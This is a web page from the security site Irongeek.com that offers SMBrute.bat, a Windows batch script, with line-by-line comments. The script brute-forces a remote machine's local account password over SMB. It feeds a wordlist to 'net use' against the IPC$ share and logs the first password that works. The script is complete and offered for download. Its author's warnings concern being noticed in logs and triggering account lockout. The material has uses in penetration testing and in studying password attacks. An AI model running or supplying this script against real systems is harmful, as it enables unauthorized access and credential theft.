A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Subscribestar or Patreon

Search Irongeek.com:

Affiliates:
Irongeek Button
Social-engineer-training Button

Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle




SMBrute SMBrute

Some folks on a forum I frequent ( http://www.thebroken.org ) asked about brute forcing Windows passwords remotely. Brutus can do it, but I've had problems with it's reliability against SMB shares. Here's a little batch script I wrote that uses the Windows 2000/XP's "NET" command to find the password for a given account. I cribbed my password list from the folks that wrote Cain and Able but you can use any list you want. Download my script and Cain's password file from here. This is a very crude way to get the password to a remote Windows box, and if anyone audits the logs they will see a lot of failed login attempts. Be careful how you use this script as many systems are set up so that they lock accounts after too many failed login attempts.

Usage: smbrute machinename local-account-to-crack

Code "SMBrute.bat": Comments:
@echo off
echo SMBrute Script, Written by Irongeek: http://www.irongeek.com
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and output.txt (Holds password and machine name)
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
if "%1"=="" goto end
if "%2"=="" goto end
del log.txt
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
:end
echo *****Done*****
Don't show the commands we are running, just to make it pretty
Print out how to use the script.


Tell the user to put the word list in the same directory as the script.
Make sure the user gives input.

Delete the old log file.
Loop until the end of the password list file.
Print the current password attempt to the screen.
Use the "NET USE" command to try and start a session.
Write valid passwords to the output file.


Your done.

 

 

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast